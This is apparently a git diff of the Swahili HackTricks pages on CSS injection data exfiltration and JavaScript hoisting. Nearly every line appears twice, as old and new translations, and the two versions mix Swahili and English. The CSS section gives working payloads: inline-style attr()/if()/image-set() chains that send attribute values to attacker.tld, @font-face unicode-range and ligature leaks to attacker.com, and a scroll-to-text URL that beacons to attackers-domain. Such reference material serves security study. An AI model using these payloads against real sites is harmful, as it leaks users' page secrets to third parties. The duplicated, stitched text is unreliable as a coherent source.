> Wakati mwingine script **haiambatani/vhaitambui vizuri kwamba prefix + suffix zilizogunduliwa tayari ni flag kamili** na itaendelea mbele (kwenye prefix) na nyuma (kwenye suffix) na baada ya muda itaishia kusimama.\
> Usijali, angalia tu **output** kwa sababu **utaona flag pale**.
### Inline-Style CSS Exfiltration (attr() + if() + image-set())
Primitive hii inaruhusu exfiltration kwa kutumia tu attribute ya inline style ya element, bila selectors au external stylesheets. Inategemea CSS custom properties, func attr() kusoma attributes za element ile ile, conditionals mpya za CSS if() kwa branching, na image-set() ili kuanzisha request ya mtandao ambayo inaencode value iliyolingana.
This primitive inaruhusu exfiltration kwa kutumia tu attribute ya inline style ya elementi, bila selectors au external stylesheets. Inategemea CSS custom properties, the attr() function kusoma attributes za elementi hiyo hiyo, the new CSS if() conditionals kwa branching, na image-set() kuanzisha request ya mtandao ambayo inaencode thamani iliyokidhiwa.
> [!WARNING]
> Equality comparisons in if() require double quotes for string literals. Single quotes will not match.
> Equality comparisons in if() zinahitaji double quotes kwa string literals. Single quotes hazitatumika.
- Sink: dhibiti attribute ya style ya element na uhakikishe attribute lengwa iko kwenye element ile ile (attr() husoma tu attributes za element ile ile).
- Read: nakili attribute kwenye variable ya CSS: `--val: attr(title)`.
- Decide: chagua URL kwa kutumia nested conditionals zinazolinganishwa variable na string candidates: `--steal: if(style(--val:"1"): url(//attacker/1); else: url(//attacker/2))`.
- Exfiltrate: tumia `background: image-set(var(--steal))` (au property yoyote inayofanya fetch) ili kulazimisha request kwa endpoint iliyochaguliwa.
- Sink: kontrolla attribute ya style ya elementi na hakikisha attribute lengwa iko kwenye elementi hiyo hiyo (attr() inasoma tu attributes za elementi hiyo).
- Read: nakili attribute ndani ya CSS variable: `--val: attr(title)`.
- Decide: chagua URL kwa kutumia nested conditionals ziki comparing variable na string candidates: `--steal: if(style(--val:"1"): url(//attacker/1); else: url(//attacker/2))`.
- Exfiltrate: tumia `background: image-set(var(--steal))` (au property yoyote inayofanya fetching) ili kulazimisha request kwenda endpoint uliyochaguliwa.
Attempt (does not work; single quotes in comparison):
```html
<div style="--val:attr(title);--steal:if(style(--val:'1'): url(/1); else: url(/2));background:image-set(var(--steal))" title=1>test</div>
```
payload inayofanya kazi (nukuu mbili zinahitajika katika ulinganisho):
Payload inayofanya kazi (nukuu za mara mbili zinahitajika katika kulinganisha):
```html
<div style='--val:attr(title);--steal:if(style(--val:"1"): url(/1); else: url(/2));background:image-set(var(--steal))' title=1>test</div>
```
Kuorodhesha thamani za sifa kwa masharti yaliyowekwa ndani:
Kuorodhesha thamani za attribute zenye masharti yaliyowekwa ndani:
```html
<div style='--val: attr(data-uid); --steal: if(style(--val:"1"): url(/1); else: if(style(--val:"2"): url(/2); else: if(style(--val:"3"): url(/3); else: if(style(--val:"4"): url(/4); else: if(style(--val:"5"): url(/5); else: if(style(--val:"6"): url(/6); else: if(style(--val:"7"): url(/7); else: if(style(--val:"8"): url(/8); else: if(style(--val:"9"): url(/9); else: url(/10)))))))))); background: image-set(var(--steal));' data-uid='1'></div>
```
Demo ya kweli (kujaribu majina ya watumiaji):
Onyesho halisi (kujaribu majina ya watumiaji):
```html
<div style='--val: attr(data-username); --steal: if(style(--val:"martin"): url(https://attacker.tld/martin); else: if(style(--val:"zak"): url(https://attacker.tld/zak); else: url(https://attacker.tld/james))); background: image-set(var(--steal));' data-username="james"></div>
```
Vidokezo na vikwazo:
Notes and limitations:
- Inafanya kazi kwenye vivinjari vya Chromium-based wakati wa utafiti; tabia inaweza kutofautiana kwenye injini nyingine za kivinjari.
- Inafaa zaidi kwa value spaces zenye ukomo/zinazohesabika (IDs, flags, short usernames). Kuba strings ndefu bila external stylesheets bado ni changamoto.
- Kila CSS property inayopakia URL inaweza kutumika kuanzisha ombi (mfano, background/image-set, border-image, list-style, cursor, content).
- Inafanya kazi kwenye vivinjari vinavyotokana na Chromium wakati wa utafiti; tabia inaweza kutofautiana kwenye injini nyingine.
- Inafaa zaidi kwa nafasi za thamani finyu/zinazohesabika (IDs, flags, short usernames). Kuiba mistari mirefu bila external stylesheets bado ni changamoto.
- Kila property ya CSS inayopakia URL inaweza kutumika kuchochea request (mfano, background/image-set, border-image, list-style, cursor, content).
Automation: a Burp Custom Action can generate nested inline-style payloads to brute-force attribute values: https://github.com/PortSwigger/bambdas/blob/main/CustomAction/InlineStyleAttributeStealer.bambda
@ -139,7 +139,7 @@ Automation: a Burp Custom Action can generate nested inline-style payloads to br
Njia nyingine za kufikia sehemu za DOM kwa kutumia **CSS selectors**:
- **`.class-to-search:nth-child(2)`**: Hii itatafuta kipengee cha pili chenye class "class-to-search" kwenye DOM.
- **`.class-to-search:nth-child(2)`**: Hii itatafuta kipengee cha pili chenye class "class-to-search" ndani ya DOM.
- **`:empty`** selector: Imetumika kwa mfano katika [**this writeup**](https://github.com/b14d35/CTF-Writeups/tree/master/bi0sCTF%202022/Emo-Locker)**:**
```css
@ -152,7 +152,7 @@ background-image: url("YOUR_SERVER_URL?1");
**Reference:** [CSS based Attack: Abusing unicode-range of @font-face ](https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html), [Error-Based XS-Search PoC by @terjanq](https://twitter.com/terjanq/status/1180477124861407234)
Lengo kwa ujumla ni **kutumia custom font kutoka kwa endpoint inayodhibitiwa** na kuhakikisha kwamba **maandishi (katika kesi hii, 'A') yanaonyeshwa na font hii tu ikiwa rasilimali iliyotajwa (`favicon.ico`) haiwezi kupakuliwa**.
Nia kuu ni **kutumia fonti maalum kutoka endpoint inayodhibitiwa** na kuhakikisha kwamba **andishi (katika kesi hii, 'A') yanaonyeshwa kwa fonti hii tu ikiwa rasilimali iliyotajwa (`favicon.ico`) haiwezi kupakuliwa**.
```html
<!DOCTYPE html>
<html>
@ -174,49 +174,49 @@ font-family: "poc";
</body>
</html>
```
1. **Matumizi ya Fonti Maalum**:
1. **Custom Font Usage**:
- Fonti maalum imefafanuliwa kwa kutumia kanuni ya `@font-face` ndani ya `<style>` tagi katika sehemu ya `<head>`.
- Fonti inaitwa `poc` na inavutwa kutoka kwa external endpoint (`http://attacker.com/?leak`).
- Mali ya `unicode-range` imewekwa kwa `U+0041`, ikilenga herufi maalum ya Unicode 'A'.
- Fonti maalum imefafanuliwa kwa kutumia kanuni ya `@font-face` ndani ya tagi ya `<style>` kwenye sehemu ya `<head>`.
- Fonti hiyo inaitwa `poc` na inapakuliwa kutoka kwenye endpoint ya nje (`http://attacker.com/?leak`).
- Mali ya `unicode-range` imewekwa kuwa `U+0041`, ikilenga kimoja maalum cha Unicode 'A'.
2. **Elemento la <object> na Maandishi ya Fallback**:
- Kipengee cha `<object>` chenye `id="poc0"` kimeundwa katika sehemu ya `<body>`. Kipengee hiki kinajaribu kupakia rasilimali kutoka `http://192.168.0.1/favicon.ico`.
- `font-family` kwa kipengee hiki imewekwa kuwa `'poc'`, kama ilivyoainishwa katika sehemu ya `<style>`.
- Iwapo rasilimali (`favicon.ico`) itashindwa kupakiwa, yaliyomo ya fallback (herufi 'A') ndani ya `<object>` tagi yataonyeshwa.
2. **Object Element with Fallback Text**:
- Elementi ya `<object>` yenye `id="poc0"` imeundwa katika sehemu ya `<body>`. Elementi hii inajaribu kupakia rasilimali kutoka `http://192.168.0.1/favicon.ico`.
- `font-family` ya elementi hii imewekwa kuwa `'poc'`, kama ilivyoainishwa katika sehemu ya `<style>`.
- Iwapo rasilimali (`favicon.ico`) itashindwa kupakia, yaliyomo ya fallback (herufi 'A') ndani ya tagi ya `<object>` yataonyeshwa.
- Yaliyomo ya fallback ('A') yataonyeshwa kwa kutumia fonti maalum `poc` ikiwa rasilimali ya nje haiwezi kupakiwa.
### Uwekaji mtindo wa Scroll-to-Text Fragment
### Styling Scroll-to-Text Fragment
Pseudo-class ya **`:target`** inatumiwa kuchagua kipengee kinacholengwa na **URL fragment**, kama ilivyoainishwa katika [CSS Selectors Level 4 specification](https://drafts.csswg.org/selectors-4/#the-target-pseudo). Ni muhimu kuelewa kwamba `::target-text` haiendani na vipengee vyovyote isipokuwa maandishi yamelengwa wazi na fragment.
The **`:target`** pseudo-class inatumiwa kuchagua elementi inayolengwa na **URL fragment**, kama ilivyoelezwa katika [CSS Selectors Level 4 specification](https://drafts.csswg.org/selectors-4/#the-target-pseudo). Ni muhimu kuelewa kwamba `::target-text` haitafanana na elementi yoyote isipokuwa maandishi yamelengwa wazi na fragment.
Shida ya usalama inatokea wakati washambuliaji wanapotumia kipengele cha **Scroll-to-text** fragment, na kuwapa uwezo wa kuthibitisha uwepo wa maandishi maalum kwenye ukurasa wa wavuti kwa kupakia rasilimali kutoka kwenye server yao kupitia HTML injection. Mbinu hiyo inahusisha kuingiza kanuni ya CSS kama hii:
Tendeka la usalama linatokea wakati attackers wanavyofaidisha kipengele cha **Scroll-to-text**, kuwapa uwezo kuthibitisha uwepo wa maandishi maalum kwenye ukurasa wa wavuti kwa kupakia rasilimali kutoka server yao kupitia HTML injection. Mbinu inajumuisha kuingiza kanuni ya CSS kama hii:
```css
:target::before {
content: url(target.png);
}
```
Katika hali kama hizi, ikiwa maandishi "Administrator" yapo kwenye ukurasa, rasilimali `target.png` itaombwa kutoka kwenye seva, ikionyesha kuwepo kwa maandishi hayo. Mfano wa shambulio hili unaweza kutekelezwa kupitia URL iliyotengenezwa kwa njia maalum inayojumuisha CSS iliyoinjizwa pamoja na Scroll-to-text fragment:
Katika matukio kama haya, endapo maandishi "Administrator" yapo kwenye ukurasa, rasilimali `target.png` itaombwa kutoka kwa seva, ikionyesha uwepo wa maandishi hayo. Mfano wa shambulio hili unaweza kutekelezwa kupitia URL iliyotengenezwa maalum inayojumuisha CSS iliyochomwa pamoja na Scroll-to-text fragment:
```
http://127.0.0.1:8081/poc1.php?note=%3Cstyle%3E:target::before%20{%20content%20:%20url(http://attackers-domain/?confirmed_existence_of_Administrator_username)%20}%3C/style%3E#:~:text=Administrator
```
Hapa, shambulio linatumia HTML injection kusafirisha CSS code, likilenga maandishi maalum "Administrator" kupitia Scroll-to-text fragment (`#:~:text=Administrator`). Ikiwa maandishi hayo yatapatikana, rasilimali iliyotajwa itapakiwa, kwa bahati mbaya ikimtangaza kuwepo kwake kwa attacker.
Hapa, shambulizi linabadilisha HTML injection ili kusafirisha CSS code, likilenga maandishi maalum "Administrator" kupitia Scroll-to-text fragment (`#:~:text=Administrator`). Ikiwa maandishi yanapatikana, rasilimali iliyotajwa inapakiwa, kwa bahati mbaya kuonyesha uwepo wake kwa mshambuliaji.
Kwa ajili ya kuzuia, mambo yafuatayo yanapaswa kuzingatiwa:
Ili kupunguza hatari, mambo yafuatayo yanapaswa kuzingatiwa:
1. **Constrained STTF Matching**: Scroll-to-text Fragment (STTF) imetengenezwa ili kuendana tu na maneno au sentensi, hivyo kupunguza uwezo wake wa leak siri yoyote au tokens.
2. **Restriction to Top-level Browsing Contexts**: STTF inafanya kazi tu katika top-level browsing contexts na haifanyi kazi ndani ya iframes, na kufanya jaribio lolote la exploitation kuonekana zaidi kwa user.
3. **Necessity of User Activation**: STTF inahitaji user-activation gesture ili ifanye kazi, ikimaanisha exploitations zinawezekana tu kupitia user-initiated navigations. Hitaji hili linapunguza kwa kiasi kikubwa hatari ya attacks kufanywa kwa automated bila user interaction. Hata hivyo, mwandishi wa blogu anaonyesha masharti maalum na bypasses (mf., social engineering, interaction na prevalent browser extensions) ambazo zinaweza kurahisisha automation ya attack.
1. **Constrained STTF Matching**: Scroll-to-text Fragment (STTF) imeundwa kuendana na maneno au sentensi tu, hivyo kupunguza uwezo wake wa leak arbitrary secrets or tokens.
2. **Restriction to Top-level Browsing Contexts**: STTF hufanya kazi tu katika top-level browsing contexts na haifanyi kazi ndani ya iframes, na hivyo kufanya jaribio lolote la exploitation liwe dhahiri zaidi kwa mtumiaji.
3. **Necessity of User Activation**: STTF inahitaji user-activation gesture ili ifanye kazi, ikimaanisha exploitations zinawezekana tu kupitia navigations zinazochochewa na mtumiaji. Mahitaji haya yanapunguza kwa kiasi kikubwa hatari ya attacks kuendeshwa kwa automation bila mwingiliano wa mtumiaji. Hata hivyo, mwandishi wa blogu anaonyesha masharti na bypasses maalum (mfano, social engineering, interaction na prevalent browser extensions) ambayo yanaweza kurahisisha automation ya attack.
Kujua kuhusu mechanisms hizi na potential vulnerabilities ni muhimu kwa kudumisha web security na kujikinga dhidi ya exploitative tactics kama hizi.
Kuwa na ufahamu wa mifumo hii na potential vulnerabilities ni muhimu kwa kudumisha usalama wa wavuti na kujilinda dhidi ya mbinu za exploitative.
Kwa taarifa zaidi angalia ripoti ya awali: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
Kwa maelezo zaidi angalia ripoti ya asili: [https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/](https://www.secforce.com/blog/new-technique-of-stealing-data-using-css-and-scroll-to-text-fragment-feature/)
You can check an [**exploit using this technique for a CTF here**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
Unaweza kuangalia an [**exploit using this technique for a CTF here**](https://gist.github.com/haqpl/52455c8ddfec33aeefb468301d70b6eb).
### @font-face / unicode-range <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
Unaweza kubainisha **fonti za nje kwa thamani maalum za unicode** ambazo zitatokewa tu ikiwa thamani hizo za unicode zipo kwenye ukurasa. Kwa mfano:
Unaweza kubainisha **external fonts for specific unicode values** ambazo zitachukuliwa tu ikiwa thamani hizo za unicode zipo kwenye ukurasa. Kwa mfano:
```html
<style>
@font-face {
@ -246,20 +246,20 @@ When you access this page, Chrome and Firefox fetch "?A" and "?B" because text n
### Text node exfiltration (I): ligatures <a href="#text-node-exfiltration-i-ligatures" id="text-node-exfiltration-i-ligatures"></a>
**Reference:** [Wykradanie danych w świetnym stylu czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
**Marejeo:** [Wykradanie danych w świetnym stylu czyli jak wykorzystać CSS-y do ataków na webaplikację](https://sekurak.pl/wykradanie-danych-w-swietnym-stylu-czyli-jak-wykorzystac-css-y-do-atakow-na-webaplikacje/)
Mbinu iliyotajwa inahusisha kutoa maandishi kutoka kwa node kwa kutumia ligatures za font na kufuatilia mabadiliko ya upana. Mchakato unajumuisha hatua kadhaa:
Mbinu iliyoelezewa inahusisha kutoa text kutoka kwa node kwa kutumia font ligatures na kufuatilia mabadiliko ya width. Mchakato unajumuisha hatua kadhaa:
1. **Creation of Custom Fonts**:
- Fonts za SVG zinaundwa zikiwa na glyphs zenye attribute `horiz-adv-x`, ambayo inasetua upana mkubwa kwa glyph inayowakilisha mfululizo wa wahusika wawili.
- Mfano wa SVG glyph: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, ambapo "XY" inaonyesha mfululizo wa wahusika wawili.
- Fonts hizi kisha zinageuzwa kuwa format ya woff kwa kutumia fontforge.
- SVG fonts are crafted with glyphs having a `horiz-adv-x` attribute, which sets a large width for a glyph representing a two-character sequence.
- Example SVG glyph: `<glyph unicode="XY" horiz-adv-x="8000" d="M1 0z"/>`, where "XY" denotes a two-character sequence.
- These fonts are then converted to woff format using fontforge.
2. **Detection of Width Changes**:
- CSS inatumiwa kuhakikisha kuwa maandishi hayajazungushwa (`white-space: nowrap`) na kubinafsisha muonekano wa scrollbar.
- Kuibuka kwa horizontal scrollbar, iliyopambwa kwa njia maalum, hutumika kama kiashiria (oracle) kuwa ligature maalum, na kwa hivyo mfululizo maalum wa wahusika, zipo ndani ya maandishi.
- CSS is used to ensure that text does not wrap (`white-space: nowrap`) and to customize the scrollbar style.
- The appearance of a horizontal scrollbar, styled distinctly, acts as an indicator (oracle) that a specific ligature, and hence a specific character sequence, is present in the text.
- The CSS involved:
```css
body {
@ -275,28 +275,28 @@ background: url(http://attacker.com/?leak);
3. **Exploit Process**:
- **Hatua 1**: Fonts zinaundwa kwa jozi za herufi zenye upana mkubwa.
- **Hatua 2**: Njia ya scrollbar inatumika kugundua wakati glyph yenye upana mkubwa (ligature ya mfululizo wa herufi mbili) inachorwa, ikionyesha uwepo wa mfululizo huo wa herufi.
- **Hatua 3**: Ukigundua ligature, glyph mpya zinazoonyesha mfululizo wa herufi tatu zinatengenezwa, zikijumuisha jozi iliyotambuliwa na kuongeza herufi kabla au baada yake.
- **Hatua 4**: Ugundaji wa ligature ya herufi tatu unafanywa.
- **Hatua 5**: Mchakato unarudishwa, ukifungua hatua kwa hatua maandishi yote.
- **Hatua 1**: Font zinatengenezwa kwa jozi za herufi zenye width kubwa.
- **Hatua 2**: Njia ya ujanja inayotegemea scrollbar inatumiwa kugundua wakati glyph yenye width kubwa (ligature ya jozi ya herufi) inapotengenezwa, ikionyesha uwepo wa mfululizo wa herufi.
- **Hatua 3**: Ukigundua ligature, glyphs mpya zinazowakilisha mfululizo wa herufi tatu zinaundwa, zikijumuisha jozi iliyogunduliwa na kuongeza herufi ya kabla au ya baada.
- **Hatua 4**: Kugundua ligature ya herufi tatu kunaendelea.
- **Hatua 5**: Mchakato unajirudia, ukifichua hatua kwa hatua maandishi yote.
4. **Optimization**:
- Njia ya kuanzisha iliyopo kwa sasa ikitumia `<meta refresh=...` si bora.
- Njia bora inaweza kuwa kutumia trick ya CSS `@import`, kuboresha utendaji wa exploit.
- Mbinu ya sasa ya kuanzisha kwa kutumia `<meta refresh=...` si ya ufanisi.
- Njia bora inaweza kutumia ujanja wa CSS `@import`, kuboresha utendaji wa exploit.
### Text node exfiltration (II): leaking the charset with a default font (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Reference:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
**Marejeo:** [PoC using Comic Sans by @Cgvwzq & @Terjanq](https://demo.vwzq.net/css2.html)
Trick hii ilitolewa katika hilo la [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what_can_we_do_with_single_css_injection/). Charset inayotumika katika text node inaweza leak kwa kutumia font za default zilizowekwa kwenye browser: hakuna fonts za nje au maalum zinazohitajika.
Hujanja hili lilitolewa kwenye [**Slackers thread**](https://www.reddit.com/r/Slackers/comments/dzrx2s/what_can_we_do_with_single_css_injection/). The charset used in a text node can be leaked **using the default fonts** installed in the browser: no external -or custom- fonts are needed.
Wazo linategemea kutumia animation kupanua upana wa `div` kwa hatua, ikiruhusu herufi moja kwa wakati kuhamia kutoka sehemu ya 'suffix' ya maandishi hadi sehemu ya 'prefix'. Mchakato huu unagawanya maandishi katika sehemu mbili:
Wazo linahusu kutumia animation kupanua polepole width ya `div`, kuruhusu herufi moja kwa wakati kuhamia kutoka sehemu ya 'suffix' ya text kwenda sehemu ya 'prefix'. Mchakato huu huwagawa text katika sehemu mbili:
1. **Prefix**: Mstari wa kwanza.
2. **Suffix**: Mstari/mistari inayofuata.
- **Prefix**: mstari wa mwanzo.
- **Suffix**: mstari( au mistari) inayofuata.
Hatua za mabadiliko ya wahusika zitaonekana kama ifuatavyo:
The transition stages of the characters would appear as follows:
**C**\
ADB
@ -309,15 +309,15 @@ B
**CADB**
Wakati wa mchakato huu, trick ya `unicode-range` inatumiwa kutambua kila herufi mpya inapojumuishwa kwenye prefix. Hii inafikiwa kwa kubadili font kuwa Comic Sans, ambayo ni wazi kuwa ndefu zaidi kuliko font ya default, na hivyo kusababisha scrollbar ya wima. Kuonekana kwa scrollbar hii kwa njia isiyo ya moja kwa moja kunaonyesha uwepo wa herufi mpya katika prefix.
Wakati wa mabadiliko haya, the **unicode-range trick** inatumiwa kubaini kila herufi mpya inapoungana na prefix. Hii inafikiwa kwa kubadilisha font kuwa Comic Sans, ambayo ni kubwa zaidi kuliko default font, na kusababisha vertical scrollbar. Kuonekana kwa scrollbar hii kwa njia isiyo ya moja kwa moja kunafichua uwepo wa herufi mpya katika prefix.
Ingawa njia hii inaruhusu kugundua herufi za kipekee zinapoonekana, haisemi ni herufi gani imekurudishwa, bali tu kwamba kurudishwa kumejitokeza.
Ingawa njia hii inaruhusu kugundua herufi za kipekee zinapoonekana, haiwezi kubainisha ni herufi gani imejirudia, bali tu kwamba kurudia kumetokea.
> [!TIP]
> Kwa msingi, `unicode-range` inatumika kugundua herufi, lakini kwa kuwa hatutaki kupakia font ya nje, tunahitaji njia nyingine.\
> Wakati herufi inapotambuliwa, inatolewa na kupatiwa font ya kabla imewekwa Comic Sans, ambayo inafanya herufi kuwa kubwa zaidi na kusababisha scrollbar ambayo italeak herufi iliyopatikana.
> Kwa msingi, the **unicode-range is used to detect a char**, lakini kwa kuwa hatutaki kupakia external font, tunahitaji kupata njia nyingine.\
> Wakati the **char** inapotambuliwa (**found**), inapewa pre-installed **Comic Sans font**, ambayo inafanya **char** kuwa **bigger** na **ina trigger scroll bar** ambayo ita **leak the found char**.
Check the code extracted from the PoC:
Angalia code iliyotolewa kutoka PoC:
```css
/* comic sans is high (lol) and causes a vertical overflow */
@font-face {
@ -744,15 +744,15 @@ background: blue var(--leak);
```
### Text node exfiltration (III): leaking the charset with a default font by hiding elements (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Marejeo:** Hii imetajwa kama [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
**Marejeo:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
Kesi hii ni sawa sana na ile ya awali, hata hivyo, katika kesi hii lengo la kufanya **chars maalum kuwa kubwa kuliko mengine ni kukificha kitu** kama kitufe ili kisibonyezwe na bot au picha ambayo haitapakiwa. Kwa hivyo tunaweza kupima kitendo (au kukosekana kwa kitendo) na kujua ikiwa char maalum ipo ndani ya maandishi.
Kesi hii ni sawa sana na ile ya awali, hata hivyo, katika kesi hii lengo la kufanya **chars bigger than other is to hide something** ni kuficha kitu kama kitufe kusiobodwe na bot au picha ambayo haitapakiwa. Hivyo tunaweza kupima kitendo (au ukosefu wa kitendo) na kujua kama char maalum ipo ndani ya maandishi.
### Text node exfiltration (III): leaking the charset by cache timing (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Marejeo:** Hii imetajwa kama [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
**Marejeo:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
Katika kesi hii, tunaweza kujaribu leak ikiwa char iko ndani ya maandishi kwa kupakia a fake font kutoka the same origin:
Katika kesi hii, tunaweza kujaribu leak ikiwa char iko ndani ya maandishi kwa loading ya fake font kutoka same origin:
```css
@font-face {
font-family: "A1";
@ -760,15 +760,15 @@ src: url(/static/bootstrap.min.css?q=1);
unicode-range: U+0041;
}
```
Ikiwa kuna mechi, **font itapakiwa kutoka `/static/bootstrap.min.css?q=1`**. Ingawa haitapakia kwa mafanikio, **kivinjari kinapaswa kuihifadhi kwenye cache**, na hata kama hakuna cache, kuna mekanismu ya **304 not modified**, hivyo **majibu yanapaswa kuwa ya haraka** kuliko vitu vingine.
If there is a match, the **font will be loaded from `/static/bootstrap.min.css?q=1`**. Although it wont load successfully, the **browser should cache it**, and even if there is no cache, there is a **304 not modified** mechanism, so the **response should be faster** than other things.
Walakini, ikiwa tofauti ya muda kati ya majibu yaliyo kwenye cache na yasiyo kwenye cache si kubwa kutosha, hii haitakuwa ya msaada. Kwa mfano, mwandishi alitaja: However, after testing, I found that the first problem is that the speed is not much different, and the second problem is that the bot uses the `disk-cache-size=1` flag, which is really thoughtful.
Hata hivyo, kama tofauti ya wakati kati ya jibu lililoko kwenye cache na lile lisiloko kwenye cache si kubwa vya kutosha, hii haitakuwa ya msaada. Kwa mfano, mwandishi alitaja: "Baada ya kujaribu, niligundua kwamba tatizo la kwanza ni kwamba kasi haitofauti sana, na tatizo la pili ni kwamba bot inatumia bendera `disk-cache-size=1`, jambo ambalo lilifikiriwa kwa uzito."
### Text node exfiltration (III): leaking the charset by timing loading hundreds of local "fonts" (not requiring external assets) <a href="#text-node-exfiltration-ii-leaking-the-charset-with-a-default-font" id="text-node-exfiltration-ii-leaking-the-charset-with-a-default-font"></a>
**Marejeo:** This is mentioned as [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
**Marejeo:** Hii imetajwa kama [an unsuccessful solution in this writeup](https://blog.huli.tw/2022/06/14/en/justctf-2022-writeup/#ninja1-solves)
Katika kesi hii unaweza kuonyesha **CSS ili kupakia mamia ya fake fonts** kutoka same origin wakati mechi inapotokea. Kwa njia hii unaweza **kupima muda** unaochukua na kugundua kama char inaonekana au la kwa kitu kama:
Katika kesi hii unaweza kuonyesha **CSS to load hundreds of fake fonts** kutoka asili moja wakati mechi inatokea. Kwa njia hii unaweza **measure the time** unaochukua na kubaini kama char inaonekana au la kwa kitu kama:
```css
@font-face {
font-family: "A1";
@ -777,13 +777,13 @@ src: url(/static/bootstrap.min.css?q=1), url(/static/bootstrap.min.css?q=2),
unicode-range: U+0041;
}
```
Na code ya bot inaonekana hivi:
Na msimbo wa bot unaonekana hivi:
```python
browser.get(url)
WebDriverWait(browser, 30).until(lambda r: r.execute_script('return document.readyState') == 'complete')
time.sleep(30)
```
Kwa hivyo, ikiwa font haifanani, muda wa majibu wakati wa kutembelea bot unatarajiwa kuwa takriban sekunde 30. Hata hivyo, ikiwa kuna mechi ya font, maombi mengi yatapelekwa ili kupata font, na kusababisha mtandao kuwa na shughuli endelevu. Matokeo yake, itachukua muda mrefu kufikia masharti ya kusitisha na kupokea jibu. Kwa hivyo, muda wa majibu unaweza kutumika kama kiashiria cha kubaini kama kuna mechi ya font.
Hivyo, ikiwa font haifanani, muda wa majibu unapotembelea bot unatarajiwa kuwa takriban sekunde 30. Walakini, ikiwa kuna mechi ya font, maombi mengi yatafanywa ili kupata font, na kusababisha shughuli za mtandao kuwa endelevu. Matokeo yake, itachukua muda mrefu zaidi kufikia hali ya kusimamisha na kupokea jibu. Kwa hivyo, muda wa majibu unaweza kutumika kama kiashiria cha kubaini kama kuna mechi ya font.
## Marejeo

417
src/pentesting-web/xss-cross-site-scripting/README.md
View File

File diff suppressed because it is too large Load Diff

38
src/pentesting-web/xss-cross-site-scripting/js-hoisting.md
View File

@ -2,31 +2,31 @@
{{#include ../../banners/hacktricks-training.md}}
## Basic Information
## Maelezo ya Msingi
Katika lugha ya JavaScript, kuna utaratibu unaoitwa **Hoisting** ambapo tamko za variables, functions, classes, au imports kwa dhana huinuliwa juu ya scope yao kabla ya msimbo kutekelezwa. Mchakato huu hufanywa kiotomatiki na JavaScript engine, ambayo hupitia script kwa vipindi vingi.
Katika lugha ya JavaScript, kuna utaratibu unaojulikana kama **Hoisting** ambapo tamko za variables, functions, classes, au imports kwa dhana zinawekwa juu ya scope yao kabla msimbo haujatekelezwa. Mchakato huu hufanywa kiotomatiki na engine ya JavaScript, ambayo inapitia script kwa vipindi vingi.
Wakati wa pass ya kwanza, engine inachambua msimbo kuangalia syntax errors na kuubadilisha kuwa abstract syntax tree. Awamu hii inajumuisha hoisting, mchakato ambapo tamko fulani huhamishwa hadi juu ya execution context. Ikiwa hatua ya parsing itafanikiwa, ikionyesha hakuna syntax errors, utekelezaji wa script unaendelea.
Wakati wa upitisho wa kwanza, engine inachambua msimbo ili kukagua makosa ya sintaksia na kuubadilisha kuwa abstract syntax tree. Awamu hii inajumuisha hoisting, mchakato ambapo tamko fulani yanahamishwa juu ya execution context. Ikiwa awamu ya parsing inapita bila makosa ya sintaksia, utekelezaji wa script unaendelea.
Ni muhimu kuelewa kwamba:
1. Script inapaswa kuwa haina syntax errors ili utekelezaji uanze. Sheria za syntax lazima zizingatiwe kikamilifu.
2. Nafasi ya msimbo ndani ya script inaathiri utekelezaji kutokana na hoisting, ingawa msimbo unaotekelezwa unaweza kutofautiana na muundo wake wa maandishi.
1. Script lazima iwe haina makosa ya sintaksia ili utekelezaji uanze. Sheria za sintaksia lazima zizingatiwe kikamilifu.
2. Mahali pa msimbo ndani ya script huathiri utekelezaji kutokana na hoisting, ingawa msimbo unaotekelezwa unaweza kutofautiana na muundo wake wa maandishi.
#### Types of Hoisting
#### Aina za Hoisting
Kulingana na MDN, kuna aina nne tofauti za hoisting katika JavaScript:
Kulingana na taarifa za MDN, kuna aina nne tofauti za hoisting katika JavaScript:
1. **Value Hoisting**: Inaruhusu matumizi ya thamani ya variable ndani ya scope yake kabla ya mstari wake wa declaration.
2. **Declaration Hoisting**: Inaruhusu kurejelea variable ndani ya scope kabla ya declaration yake bila kusababisha `ReferenceError`, lakini thamani ya variable itakuwa `undefined`.
3. Aina hii inabadilisha tabia ndani ya scope kutokana na tamko la variable kabla ya mstari wake halisi wa declaration.
4. Madhara ya tamko yanatokea kabla ya sehemu nyingine za msimbo zinazojumuisha tamko hilo kuangaliwa.
1. **Value Hoisting**: Inawezesha kutumia thamani ya variable ndani ya scope yake kabla ya mstari wake wa tamko.
2. **Declaration Hoisting**: Inaruhusu kurejelea variable ndani ya scope kabla ya tamko bila kusababisha `ReferenceError`, lakini thamani ya variable itakuwa `undefined`.
